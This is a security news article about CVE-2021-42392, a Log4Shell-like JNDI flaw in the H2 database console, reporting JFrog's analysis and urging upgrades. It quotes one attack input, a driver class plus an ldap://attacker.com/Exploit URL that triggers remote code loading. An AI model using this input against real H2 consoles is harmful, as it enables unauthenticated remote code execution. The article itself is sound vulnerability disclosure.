Security researchers are warning of a critical new Java bug with the same root cause as the notorious Log4Shell vulnerability currently being exploited around the globe.
CVE-2021-42392 has yet to be officially published in the National Vulnerability Database (NVD), but according to JFrog, it impacts the console of the popular H2 Java SQL database.
The security firm urged any organization currently running an H2 console exposed to their LAN or WAN to update the database immediately to version 2.0.206 or risk attackers exploiting it for unauthenticated remote code execution (RCE).
Like Log4Shell, the bug relates to JNDI (Java Naming and Directory Interface) “remote class loading.” JNDI is an API that provides naming and directory functionality for Java apps. It means that if an attacker can get a malicious URL into a JNDI lookup, it could enable RCE.
“In a nutshell, the root cause is similar to Log4Shell – several code paths in the H2 database framework pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function, which allows for remote codebase loading (AKA Java code injection AKA remote code execution),” JFrog explained.
“Specifically, the org.h2.util.JdbcUtils.getConnection method takes a driver class name and database URL as parameters. If the driver’s class is assignable to the javax.naming.Context class, the method instantiates an object from it and calls its lookup method.”
It added that supplying a driver class such as “javax.naming.InitialContext” and a URL as simple as ldap://attacker.com/Exploit will lead to remote code execution.
JFrog said the vulnerability is particularly dangerous as the H2 database package is particularly popular. It’s one of the top 50 most popular Maven packages, with almost 7000 artifact dependencies, the firm claimed.
However, there are some reasons why exploitation won’t be as widespread as Log4Shell. For one, it has a “direct scope of impact,” meaning vulnerable servers should be easier to find.
Second, in most H2 distributions, the console only listens to localhost connections, meaning the default setting is not exploitable.
“Many vendors may be running the H2 database, but not running the H2 console,” JFrog added. “Although there are other vectors to exploit this issue other than the console, these other vectors are context-dependent and less likely to be exposed to remote attackers.”